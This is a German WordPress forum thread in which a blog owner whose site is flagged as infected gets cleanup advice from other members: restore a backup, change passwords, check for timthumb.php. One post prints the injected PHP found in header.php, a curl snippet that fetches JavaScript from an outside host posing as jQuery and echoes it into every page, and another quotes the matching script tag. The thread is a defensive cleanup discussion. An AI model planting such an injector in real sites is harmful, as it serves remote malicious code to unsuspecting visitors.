1. Herzlich willkommen bei WPDE.org, dem grössten und ältesten deutschsprachigen Community-Forum rund um das Thema WordPress. Du musst angemeldet oder registriert sein, um Beiträge verfassen zu können.
    Information ausblenden

Virus beim Laden von Web-Inhalten gefunden.

Dieses Thema im Forum "Allgemeines" wurde erstellt von bischiOo, 3. August 2012.

  1. bischiOo

    bischiOo Active Member

    Registriert seit:
    6. Juni 2012
    Beiträge:
    34
    Zustimmungen:
    0
    Guten Tag Zusammen,

    seit heute morgen kann ich meinen Blog nicht mehr aufrufen da G-Data folgende Meldung bringt:

    Prüfung von Web-Inhalten:

    Virus: HTML:Script-inf (Engine B)

    Virus beim Laden von Web-Inhalten gefunden.

    Adresse: fb-designs.de
    Status: Der Zugriff wurde verweigert.

    Firefox sagt mir:

    Besitzer: Diese Website stellt keine Informationen über den Besitzer zur Verfügung.



    bis gestern Abend war noch alles wunderbar, seitdem habe ich nichts an der Website gemacht als ein backup der Datenbank zu erstellen.

    Kann mir irgendjemand sagen was das soll und wie ich mein Problem lösen kann?

    die Url der Website lautet www.fb-designs.de

    danke
     
  2. befla

    befla Gast

    acht mal Malware gefunden
     
  3. bischiOo

    bischiOo Active Member

    Registriert seit:
    6. Juni 2012
    Beiträge:
    34
    Zustimmungen:
    0
    und wie werde ich die los?
     
  4. befla

    befla Gast

    Indem du die verseuchten Dateien scannst, bereinigst und die Sicherheitslücke schliesst oder einen Fachmann beauftragst
     
  5. bischiOo

    bischiOo Active Member

    Registriert seit:
    6. Juni 2012
    Beiträge:
    34
    Zustimmungen:
    0
    ich habe lokal alle Daten + Datenbank backup lokal liegen, gesichert wurde dies alles gestern noch als alles noch ohne Probleme lief. Ich habe die lokalen Daten mit G Data gescannt, demnach scheint auch alles in Ordnung zu sein. Kann ich nicht meine online Daten durch meine lokalen Daten ersetzten ?

    Was meinst du mit bereinigen, kann ich dies mit einem Programm bewerkstelligen oder müsste ich quasi jede Datei inhaltlich mit Originalen nicht infizierten Datein vergleichen und abweichendes löschen?

    wie kann sowas überhaupt passieren? grundlegend müsste ich ja die Sicherheitslücke erstmal schließen, das einzigste was mir hierzu einfällt wäre ein infiziertes FTP Programm.

    danke
     
  6. befla

    befla Gast

    Natürlich kannst du dein letztes, bereinigtes Backup einspielen. Jedoch musst du dann auch die Sicherheitslücke finden und schliessen. Auch alle PW's ändern.
    Mit Bereinigen meine ich die Malware zu entfernen.
     
  7. bischiOo

    bischiOo Active Member

    Registriert seit:
    6. Juni 2012
    Beiträge:
    34
    Zustimmungen:
    0
    hm also ich habe mein gescanntes backup überspielt die Website ist aber nach wie vor gesperrt? Pw wie Ftp Programm wurde gewechselt. Kannst du dir darauf einen Reim machen? Kann es sein das die Seite bei G Data temporär immernoch gesperrt ist?
     
  8. bischiOo

    bischiOo Active Member

    Registriert seit:
    6. Juni 2012
    Beiträge:
    34
    Zustimmungen:
    0
    Das wäre alles nicht so tragisch wenn ich die Website nicht aktuell zur Bewerbung benötigen würde, aber is typisch so ne scheisse passiert mir immer ^^
     
  9. Michi91

    Michi91 Well-Known Member

    Registriert seit:
    8. November 2008
    Beiträge:
    1.972
    Zustimmungen:
    42
    gibts da wenn du die virenmeldung hast einen link zum "erneutes überprüfen der webseite" oder so??
    Wenn du ein sauberes backup eingespielt hast, sollte es ein temp problem sein.

    konntest du schon die sicherheitslücke finden? verwendest du alte plugin oder gibt es die timthumb.php in einem deiner themes?
     
  10. Michi91

    Michi91 Well-Known Member

    Registriert seit:
    8. November 2008
    Beiträge:
    1.972
    Zustimmungen:
    42
    Habe deine Website gerade mal scannen lassen... deine webseite ist immernoch belastet: http://sitecheck.sucuri.net/results/fb-designs.de/

    irgendwo versteckt sich <script type="text/javascript" src="http://www.jquerys.org/ajax/libs/jquery/jquery-1.6.3.min.js"></script> und die Datei auf die verwiesen wird ist belastet
     
  11. bischiOo

    bischiOo Active Member

    Registriert seit:
    6. Juni 2012
    Beiträge:
    34
    Zustimmungen:
    0
    Einen Refresh button gibt es nicht zum erneuten überprüfen. Wie du im nachstehenden Beitrag ja aber sagtest ist die Seite sowieso noch verseucht nur versteh ich das richtig und die versuchte Datei liegt gar nicht bei mir auf dem Webspace sondern auf diese wird einfach nur verwiesen?

    Eine Idee wie ich am besten vorgehen könnte um diesen Verweis zu finden? Ohne das ich jede einzelene Datei nach diesem Link durchsuchen zu müssen ?
     
  12. Michi91

    Michi91 Well-Known Member

    Registriert seit:
    8. November 2008
    Beiträge:
    1.972
    Zustimmungen:
    42
    der schadecode befindet sich nicht auf deinem server richtig, aber irgendwo muss der verweis ja herkommen und dementsprechnd ist davon auszugehen dass du gehackt wurdest oder halt diese jquery seite...

    versuchs mal in der header.php, ansonsten einfach alle dateien auf einmal durchsuchen ( zb mit notepad++)
     
  13. bischiOo

    bischiOo Active Member

    Registriert seit:
    6. Juni 2012
    Beiträge:
    34
    Zustimmungen:
    0
    ok ganz dumme Frage aber wie kann ich mit notepad mehr als eine Datei durchsuchen? Ich hätte alternativ auch den Dreamwaever zur Verfügung.

    danke
     
  14. bischiOo

    bischiOo Active Member

    Registriert seit:
    6. Juni 2012
    Beiträge:
    34
    Zustimmungen:
    0
    also ich habe in der header.php und sonst nirgends folgenden verweis gefunden:

    <?php if(function_exists('curl_init')) { $url = "http://www.wpstats.org/jquery-1.6.3.min.js"; $ch = curl_init(); $timeout = 5; curl_setopt($ch,CURLOPT_URL,$url); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout); $data = curl_exec($ch); curl_close($ch); echo "$data"; } ?>


    soll ich den kompletten part einfach löschen?

    danke dir
     
  15. Michi91

    Michi91 Well-Known Member

    Registriert seit:
    8. November 2008
    Beiträge:
    1.972
    Zustimmungen:
    42
    ja bitte entfernen, durchsuch die anderen dateinen auch nochmal nach curl und komsichen abfragen,
    ansonsten: hast du schon die lücke in deinem blog gefunden? gibt es eine timthumb.php? hast du weitere php scripte auf dem gleichen webspace?
     
  16. bischiOo

    bischiOo Active Member

    Registriert seit:
    6. Juni 2012
    Beiträge:
    34
    Zustimmungen:
    0
    also eine timthumb.php gibt es nicht, ich hab den kompletten webspace eben platt gemacht und dann mein backup wieder aufgespielt, anschließend habe ich den verweiss entfernt, seltsam ist nur das die Seite auch schon davor wieder ging ^^ Wo jetzt aber wirklich die Sicherheitslücke liegt bleibt ein Fragezeichen. Ich habe nur Wordpress auf die aktuelle Version geupdatet, mein Ftp Programm gewechselt und Passwörter bezüglich des Webspac verändert.
     
  1. Diese Seite verwendet Cookies, um Inhalte zu personalisieren, diese deiner Erfahrung anzupassen und dich nach der Registrierung angemeldet zu halten.
    Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies.
    Information ausblenden
  1. Diese Seite verwendet Cookies, um Inhalte zu personalisieren, diese deiner Erfahrung anzupassen und dich nach der Registrierung angemeldet zu halten.
    Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies.
    Information ausblenden